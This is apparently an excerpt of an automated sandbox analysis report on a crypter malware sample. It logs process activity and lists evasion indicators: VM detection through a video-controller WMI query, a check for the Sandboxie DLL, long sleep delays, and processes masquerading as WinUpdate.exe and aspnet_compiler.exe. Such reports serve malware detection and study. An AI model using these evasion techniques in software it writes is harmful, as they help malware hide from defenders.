                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\XClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053224069.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: WinUpdate.exe, 00000013.00000002.2489538224.0000000002752000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLLLBDQ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: 5600000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: 6600000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: 6B50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: 7B50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeMemory allocated: 80B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 7600000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 6D20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 9570000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 8B10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 9570000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2C10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 11C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 3180000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 3420000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 3180000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 5E40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 6E40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 73A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 83A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 2710000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 4710000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 5260000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 6260000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 67C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 77C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 7D20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: B50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 4580000 memory reserve | memory write watch
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeMemory allocated: 1730000 memory reserve | memory write watch
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeMemory allocated: 3600000 memory reserve | memory write watch
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeMemory allocated: 1A60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 24E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2670000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 4670000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: F30000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 29A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 2750000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 5830000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 6830000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 6CB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeMemory allocated: 7CB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1310000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2F60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2D80000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 1470000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 3040000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: 2D60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1550000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 32A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 52A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2620000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2810000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 2620000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeThread delayed: delay time: 922337203685477
